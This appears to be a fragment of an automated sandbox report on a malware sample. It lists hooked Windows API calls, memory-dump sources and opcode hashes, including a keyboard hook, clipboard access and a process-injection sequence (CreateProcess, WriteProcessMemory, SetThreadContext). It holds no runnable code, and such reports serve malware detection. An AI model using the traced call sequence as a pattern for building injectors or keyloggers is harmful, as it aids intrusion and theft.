                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: CreateWindow
                                            • String ID:
                                            • API String ID: 716092398-0
                                            • Opcode ID: 58fb3ecff0733ae5ac397a1ab9f5215f847f5651c1666d66c87b5f064b888ccf
                                            • Instruction ID: ae75cedd72269b4ea2d031873a4cf4cfe4276ec08ad2ddd643d0b41813c0a129
                                            • Opcode Fuzzy Hash: 58fb3ecff0733ae5ac397a1ab9f5215f847f5651c1666d66c87b5f064b888ccf
                                            • Instruction Fuzzy Hash: 8A41C0B1D003599FDF14CF9AC984ADEBBB5FF48310F24812AE819AB250D775A845CF90

                                            Control-flow Graph

                                            APIs
                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0693D649
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: CallProcWindow
                                            • String ID:
                                            • API String ID: 2714655100-0
                                            • Opcode ID: dc52e54fc5454c8c93c4ff2b6f7e6de7ac414b26f155f227246c451df394a1e0
                                            • Instruction ID: 5274d1ab03d137f011e8bb1a10d8e8cea32967bd7eff10feff720e5960f8ac11
                                            • Opcode Fuzzy Hash: dc52e54fc5454c8c93c4ff2b6f7e6de7ac414b26f155f227246c451df394a1e0
                                            • Instruction Fuzzy Hash: 64414AB4900319CFCB54CF99C488AAABBF9FF88318F24C459D519AB321D335A944CFA0

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 361f1762ef91a373200775b53906b3f55551b6fbc25634d9700c75127137e37c
                                            • Instruction ID: b78c2728213cb08017aec03c8b36f9f131605c851826d3a2d77a09368c8be612
                                            • Opcode Fuzzy Hash: 361f1762ef91a373200775b53906b3f55551b6fbc25634d9700c75127137e37c
                                            • Instruction Fuzzy Hash: 883114B0D01359DFDB14DFA9C984BCEBFF5AF48304F24802AE404AB290D7B4A945CBA5

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Clipboard
                                            • String ID:
                                            • API String ID: 220874293-0
                                            • Opcode ID: 44749facf8b10c6a29552e2bed42d1639964f955614398ec45a0ea9fa6f162cd
                                            • Instruction ID: 4034ce669160a0283cec002132b387359cf6fb3b9c5d559c3f52bc4265649ec5
                                            • Opcode Fuzzy Hash: 44749facf8b10c6a29552e2bed42d1639964f955614398ec45a0ea9fa6f162cd
                                            • Instruction Fuzzy Hash: 393112B0D01259DFDB54DF99C984BDEBBF5AF48304F20802AE504AB3A0D7B4A945CB95

                                            Control-flow Graph

                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0693C77F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 9954978ab960b6d0a36ab6e1b48082e8483e8f7edfd5fb12f1f72d77108be1e5
                                            • Instruction ID: b6ec98de5d2d9c58b2ea7ad6089abd5d9363f15de0fab26edb1dfb27bcd95a03
                                            • Opcode Fuzzy Hash: 9954978ab960b6d0a36ab6e1b48082e8483e8f7edfd5fb12f1f72d77108be1e5
                                            • Instruction Fuzzy Hash: 8921E5B59003589FDB10CFAAD984ADEBFF9EB48310F14801AE919A7350D379A944CFA5

                                            Control-flow Graph

                                            APIs
                                            • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,0693FC90,00000000,00000000), ref: 0693FEA3
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: HookWindows
                                            • String ID:
                                            • API String ID: 2559412058-0
                                            • Opcode ID: e0e88d90c2084d675f6f39833de5b11a111985718d741dda78700d3ba8f1fec7
                                            • Instruction ID: 20f203d567b26bcacdcedcdfe2e23daff98700503bd4413764ce6466b6c1660a
                                            • Opcode Fuzzy Hash: e0e88d90c2084d675f6f39833de5b11a111985718d741dda78700d3ba8f1fec7
                                            • Instruction Fuzzy Hash: B82107B5D002199FCB24DF9AD844BEEBBF9EB88310F108419E419A7250C774A945CFA1

                                            Control-flow Graph

                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0693C77F
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 59b14aff4e717814125fe0a3cf19cdcee06a53734680221cacdb2d59fbb4cf15
                                            • Instruction ID: bb8de3acaf371f2b430840d705c40b39b4ba9c382a3bc41a3d371b22d1306834
                                            • Opcode Fuzzy Hash: 59b14aff4e717814125fe0a3cf19cdcee06a53734680221cacdb2d59fbb4cf15
                                            • Instruction Fuzzy Hash: 8821E4B5D003589FDB10CFAAD984ADEBBF9FB48310F14801AE918A7310D378A944CFA4

                                            Control-flow Graph

                                            APIs
                                            • DeleteFileW.KERNELBASE(00000000), ref: 032B72C8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4509377804.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_32b0000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            • Opcode ID: 9283b1fa9b7be148556d5f525957d392e035c70df045b2d35f2e4572ea710041
                                            • Instruction ID: d736870caefcf226cfb448a3832daedc1037dad564b3c6c9837c70d7172fe3f2
                                            • Opcode Fuzzy Hash: 9283b1fa9b7be148556d5f525957d392e035c70df045b2d35f2e4572ea710041
                                            • Instruction Fuzzy Hash: B82124B1C1065A9FCB10CFAAD945AEEFBB4FF48310F14852AD818A7240D738A945CFA5
                                            APIs
                                            • DeleteFileW.KERNELBASE(00000000), ref: 032B72C8
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4509377804.00000000032B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_32b0000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            • Opcode ID: 568425a2ddea5013ab150b09ab452f238954981bb2a927e1c2877b061ef66257
                                            • Instruction ID: f0e6a9848bbfd36b1a966fe23513136dc97bb3028cfb2829a8d9a934f6d2eb0f
                                            • Opcode Fuzzy Hash: 568425a2ddea5013ab150b09ab452f238954981bb2a927e1c2877b061ef66257
                                            • Instruction Fuzzy Hash: 001136B1C0065A9BCB10CF9AC544AEEFBF4EF48320F14812AD818A7240D738A944CFA5
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06937956
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 96c287bc7bc9aa10f4126cdfc9a5a569d85a377548b960cfe2ff357443433cb3
                                            • Instruction ID: 6359ffcd5e07c3f6fbb4fc8eaabf500fa1b975f0477f71dc69c30a806e2a7005
                                            • Opcode Fuzzy Hash: 96c287bc7bc9aa10f4126cdfc9a5a569d85a377548b960cfe2ff357443433cb3
                                            • Instruction Fuzzy Hash: A81120B1C003598FCB10DF9AD444A9EFBF8EB49220F10856AD829BB700D378A545CFA4
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 06937956
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: edd779748367ab5118c9daca846ec125e9e98fa148626a6d637f483c5d0297e6
                                            • Instruction ID: 8553fbe2ebb940fe65a50819eb5aad0116032ae7bc5e4373aadbc05aa44a7cd4
                                            • Opcode Fuzzy Hash: edd779748367ab5118c9daca846ec125e9e98fa148626a6d637f483c5d0297e6
                                            • Instruction Fuzzy Hash: BE1132B5C002598FCB10CF9AC844BDEFBF8AF48214F10851AD419B7700D378A545CFA4
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0693D89D), ref: 0693D927
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 67686c86f62c17d6be7790aa16dba1132564a903274f86b1dcc6302c0089d34e
                                            • Instruction ID: b0277543342e495b557a64d9e332a80a4839fcca39711e357a8d522ebaa0b55a
                                            • Opcode Fuzzy Hash: 67686c86f62c17d6be7790aa16dba1132564a903274f86b1dcc6302c0089d34e
                                            • Instruction Fuzzy Hash: B811F2B58002588FCB10DF9AD448B9EBBF8EF49324F20845AD519A7640C378A944CFA5
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0693E1E5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 72c5bf4b23973462f5a6d48fd09a9937addf6fe2b0f5e1c553b742fb91781be0
                                            • Instruction ID: b40a09c14c180470b4910e86d2b2362ee2ac5e25d77df004c4464048c15e1172
                                            • Opcode Fuzzy Hash: 72c5bf4b23973462f5a6d48fd09a9937addf6fe2b0f5e1c553b742fb91781be0
                                            • Instruction Fuzzy Hash: 5E1103B58043598FDB20DF9AD448B9EBBF8EB48314F20845AE519A7610D378A944CFA5
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0693E1E5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: 8f8c170756a23d604fbdc9445572e3db284762b4496eb280b54abee60abd143d
                                            • Instruction ID: 7d3b89e3aa64ada3ff2032be286a8103292a9984ab10f417c20693918be6da1f
                                            • Opcode Fuzzy Hash: 8f8c170756a23d604fbdc9445572e3db284762b4496eb280b54abee60abd143d
                                            • Instruction Fuzzy Hash: F71115B5900358CFDB20DF9AD845BDEBBF8EB48314F20841AE559A7710C379A944CFA5
                                            APIs
                                            • OleInitialize.OLE32(00000000), ref: 0693E1E5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: Initialize
                                            • String ID:
                                            • API String ID: 2538663250-0
                                            • Opcode ID: f50baa4e547ca2fc0652937569478428059ecb8e6f20a6c3a868e27f638343d0
                                            • Instruction ID: 7ebc018ee8f23088d088c14e4a24d0db7592e087bc479ff25b80da15d3617001
                                            • Opcode Fuzzy Hash: f50baa4e547ca2fc0652937569478428059ecb8e6f20a6c3a868e27f638343d0
                                            • Instruction Fuzzy Hash: 501103B58002498FDB20DFAAD444BDEFFF8EB48324F20845AE559A7700C379A544CFA5
                                            APIs
                                            • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,0693D89D), ref: 0693D927
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4513669327.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_6930000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID: CallbackDispatcherUser
                                            • String ID:
                                            • API String ID: 2492992576-0
                                            • Opcode ID: 14032e8c52889568746501e9fbc370ed7262091990ffb6218cf277c69b4cb690
                                            • Instruction ID: 5902b5a3fa82db3030c24b8081b52a568933d1ee9f2a8ebffcf210b91ea9a2ee
                                            • Opcode Fuzzy Hash: 14032e8c52889568746501e9fbc370ed7262091990ffb6218cf277c69b4cb690
                                            • Instruction Fuzzy Hash: DF1112B5800289CFCB10DFAAD584BDEFBF8EF49324F20845AD559A7650C378A544CFA5
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4508689179.0000000001ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1abd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 33b035f2dda2c57417f20d7b460c348654635e79ca008662ece9e043b8467748
                                            • Instruction ID: 7cfdf0d617e20205d63d437f7c6a6b01217ab50d1e1faa01c2e3d86eccd4c80f
                                            • Opcode Fuzzy Hash: 33b035f2dda2c57417f20d7b460c348654635e79ca008662ece9e043b8467748
                                            • Instruction Fuzzy Hash: 34212271604280DFCB15DFA8D9C0B26BF69FB88328F24C56DD90A0B257C33AD807CA61
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4508689179.0000000001ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1abd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2f7a919193eb65c82733cb327ec9f5152f993c44c491887f61fcdfa9737d3d30
                                            • Instruction ID: 18e47ab780d2edc397692fa4b944ee01819dfc4795126709ecf6ae44f3558df4
                                            • Opcode Fuzzy Hash: 2f7a919193eb65c82733cb327ec9f5152f993c44c491887f61fcdfa9737d3d30
                                            • Instruction Fuzzy Hash: 2321C271504384EFDB05DFA8E9C4B26BF69FB84318F24C66DE9094B257C33AD446C661
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4508689179.0000000001ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1abd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction ID: b1393a7117ee1ebebeca42e298598afde0c97d113e83e8dab53ef09530fb308f
                                            • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                            • Instruction Fuzzy Hash: 9911BE75504280CFDB12CF54D5C4B15BF61FB44328F24C6A9D84A4B657C33AD40ACB62
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.4508689179.0000000001ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 01ABD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_1abd000_Eschemyquote24573j33.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                            • Instruction ID: 6580d41bb9184c653cb3016e03631fbb1bc5038974c3ab34a21d04169efa25a2
                                            • Opcode Fuzzy Hash: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                            • Instruction Fuzzy Hash: E711DD75504380CFDB06CF14D9C4B15BFA1FB84218F24C6ADD8494B657C33AD44ACB52

                                            Execution Graph

                                            Execution Coverage:11.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:184
                                            Total number of Limit Nodes:9

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 012CD3FE
                                            • GetCurrentThread.KERNEL32 ref: 012CD43B
                                            • GetCurrentProcess.KERNEL32 ref: 012CD478
                                            • GetCurrentThreadId.KERNEL32 ref: 012CD4D1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID: 4']q
                                            • API String ID: 2063062207-1259897404
                                            • Opcode ID: 806bfca1259b97cef5c9c7fdb94f143e555ecd74d4db2f45f19242646242e778
                                            • Instruction ID: 6e3aba52437bfb5ee35c8ade3d7e7cec4fcb3e9c39d6487fdd3ddfcd10be1ac4
                                            • Opcode Fuzzy Hash: 806bfca1259b97cef5c9c7fdb94f143e555ecd74d4db2f45f19242646242e778
                                            • Instruction Fuzzy Hash: E36167B09002098FDB18DFA9D548BDEBBF5FF49304F2085A9D219A7360D739A945CBA1

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 012CD3FE
                                            • GetCurrentThread.KERNEL32 ref: 012CD43B
                                            • GetCurrentProcess.KERNEL32 ref: 012CD478
                                            • GetCurrentThreadId.KERNEL32 ref: 012CD4D1
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID:
                                            • API String ID: 2063062207-0
                                            • Opcode ID: 718a057b56ac07e93d2bf7dfe21e42c846f348b96315e5fb20318e5267761228
                                            • Instruction ID: f916b3eefd09ce91198f84e2eae5e9c83a6bb49c253d7e6a70b5edfddd3d4634
                                            • Opcode Fuzzy Hash: 718a057b56ac07e93d2bf7dfe21e42c846f348b96315e5fb20318e5267761228
                                            • Instruction Fuzzy Hash: 865167B09002098FDB14DFA9D548BEEFBF5EF49304F208469E219A7390D738A944CBA5

                                            Control-flow Graph

                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07087B76
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: 3688f16a80589877df717c56e7cd6c837fc8b81929aad34294e0123fa29c31c7
                                            • Instruction ID: 5d69085be1bb702a44121348e5ca71cfb3bc34e40ce0f6736f4b4068a1d5dba3
                                            • Opcode Fuzzy Hash: 3688f16a80589877df717c56e7cd6c837fc8b81929aad34294e0123fa29c31c7
                                            • Instruction Fuzzy Hash: 73A181B1D0021ACFDB64DFA8C841BEDBBF2BF44310F14866AD858A7244DB749A85CF91

                                            Control-flow Graph

                                            APIs
                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07087B76
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: CreateProcess
                                            • String ID:
                                            • API String ID: 963392458-0
                                            • Opcode ID: a3caeb41f681e6a799048ed112c6e2fb8bb0926f0b74a1ff7a8bc0a00cf4068d
                                            • Instruction ID: a6460e1dabc5ebfa0db1fa408da87d7bf27de9eb1150b1b1d4ba5e48a047532e
                                            • Opcode Fuzzy Hash: a3caeb41f681e6a799048ed112c6e2fb8bb0926f0b74a1ff7a8bc0a00cf4068d
                                            • Instruction Fuzzy Hash: 1A918FB1D0021ACFDB64DFA8C840BEDBBF2BF48310F148669D858A7244DB749A85CF91

                                            Control-flow Graph

                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 012CB33E
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 6890efbdb9cb4efe120c4a4b90b9b954e0031f2e396dbd365c5c10210a40da29
                                            • Instruction ID: 7151da32f9f37da57e0e1ae0ef68e2fa00542690cbd81992787479553412e4ce
                                            • Opcode Fuzzy Hash: 6890efbdb9cb4efe120c4a4b90b9b954e0031f2e396dbd365c5c10210a40da29
                                            • Instruction Fuzzy Hash: 9B716470A10B468FD724CF6AD44576ABBF1FF88740F008A2ED68AD7A40D774E949CB91
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 012C59C9
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: 12fc817d15d3c8fa95ec2b8dd0b7b3c02a2b573eecaf17c7cdc1e412e0000382
                                            • Instruction ID: cbf79827af0f743d81306d7fa982b19dd1e518f8462924ef9dd9bb90ac38bdd4
                                            • Opcode Fuzzy Hash: 12fc817d15d3c8fa95ec2b8dd0b7b3c02a2b573eecaf17c7cdc1e412e0000382
                                            • Instruction Fuzzy Hash: F04103B0D00719CEDB24CFAAC844BCEBBB5BF49704F20816AD519AB250DB75694ACF91
                                            APIs
                                            • CreateActCtxA.KERNEL32(?), ref: 012C59C9
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: Create
                                            • String ID:
                                            • API String ID: 2289755597-0
                                            • Opcode ID: ff9c0e9872b8aa4bf2ef964bef72e1e03949076e6770e3b7bce6b422ba152e40
                                            • Instruction ID: 218bb5ad3412ee42fbf82b270a9fac973c9760da58bdc9d3d76128da91aa57e0
                                            • Opcode Fuzzy Hash: ff9c0e9872b8aa4bf2ef964bef72e1e03949076e6770e3b7bce6b422ba152e40
                                            • Instruction Fuzzy Hash: 664102B0D00719CBDB24CFAAC844BCEBBF5BF49704F2081AAD518AB250DB756945CF90
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2195221368.00000000012C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012C0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_12c0000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e6aa0987326abca4a6f5cc9be6d572f18471e08e08652cc530fd3ce7b2e90f46
                                            • Instruction ID: 782c0d8577968239b8022c851135b3478e561d7cdba941064f47bcc96822ffc9
                                            • Opcode Fuzzy Hash: e6aa0987326abca4a6f5cc9be6d572f18471e08e08652cc530fd3ce7b2e90f46
                                            • Instruction Fuzzy Hash: DE310F72D04349CFDB11CBA8C8553EEBFB0BF42714F14418EC6496B251C775A80ACB81
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07087748
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 838827198a4d6ef14df76f005a9d29834c77540ac6d0fc51ee153f0dad988caa
                                            • Instruction ID: 952678fe73832b65ee54356dc73d00cbd3814cb15fc56e3fb8b798dd35458026
                                            • Opcode Fuzzy Hash: 838827198a4d6ef14df76f005a9d29834c77540ac6d0fc51ee153f0dad988caa
                                            • Instruction Fuzzy Hash: DC216BB59003099FCB10DFA9C885BEEBFF5FF48310F108829E559A7240D7789945CBA4
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07087748
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: 35c324dd8ffdf17f0fd0ac755d7cee6a00147f625f97487ea8374d186b44ef03
                                            • Instruction ID: 8675eea3dd1f02a8ddba4a601969e4fa3543aa1db96c890825de44562435559e
                                            • Opcode Fuzzy Hash: 35c324dd8ffdf17f0fd0ac755d7cee6a00147f625f97487ea8374d186b44ef03
                                            • Instruction Fuzzy Hash: 832139B59003099FCB10DFA9C885BEEBBF5FF48310F108829E959A7240D7789944CBA4
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07087828
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 043851cb418a8c0cdadb967db200973fc4fc02012c1675e4dc3dcf3008fe6905
                                            • Instruction ID: 7d7952618b6d373aa16f0189a306f69659a233bc40be9d42ded0fe28570c4350
                                            • Opcode Fuzzy Hash: 043851cb418a8c0cdadb967db200973fc4fc02012c1675e4dc3dcf3008fe6905
                                            • Instruction Fuzzy Hash: 892128B1C002499FCB10DFAAD841AEEFBF5FF48310F60882AE559A7250D7789544DBA1
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07087166
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2200853267.0000000007080000.00000040.00000800.00020000.00000000.sdmp, Offset: 07080000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_7080000_ctsdvwT.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: d42da060c1485bb70b568947085fc6175f87ec8aae4769d47c37c83f48b7e9c3
                                            • Instruction ID: ae14fc06c12ed51cd7af12225c82fbb7c7d0c57cb8340f486bf739d54eb30087
                                            • Opcode Fuzzy Hash: d42da060c1485bb70b568947085fc6175f87ec8aae4769d47c37c83f48b7e9c3
                                            • Instruction Fuzzy Hash: FF2159B19002098FCB10DFAAC4857EEBFF5EF49310F108429D559A7640CB789584CFA0
                                            APIs
